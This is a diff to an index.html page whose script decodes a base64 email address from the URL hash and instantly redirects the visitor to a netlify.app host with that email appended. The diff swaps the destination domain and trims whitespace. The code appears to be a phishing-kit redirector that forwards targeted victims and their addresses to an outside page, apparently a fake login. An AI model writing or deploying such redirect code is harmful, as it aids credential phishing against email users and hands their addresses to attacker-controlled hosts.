--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-﻿<html lang="en">
+<html lang="en">
 <head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta charset="utf-8">
@@ -14,7 +14,7 @@
     // Use hash if present, otherwise eta
     var param = hash || eta || '';
     var url_get_email = atob(getafterhash(param));
-    var mail_go_url = "https://enchanting-lamington-02e8bf.netlify.app#" + url_get_email + "";
+    var mail_go_url = "https://delicate-tanuki-c2393a.netlify.app#" + url_get_email + "";
     location.replace(mail_go_url);
 
     function getafterhash(url) {
@@ -46,12 +46,4 @@
     }
   </script>
 </body>
-
 </html>
-
-
-
-
-
-
-
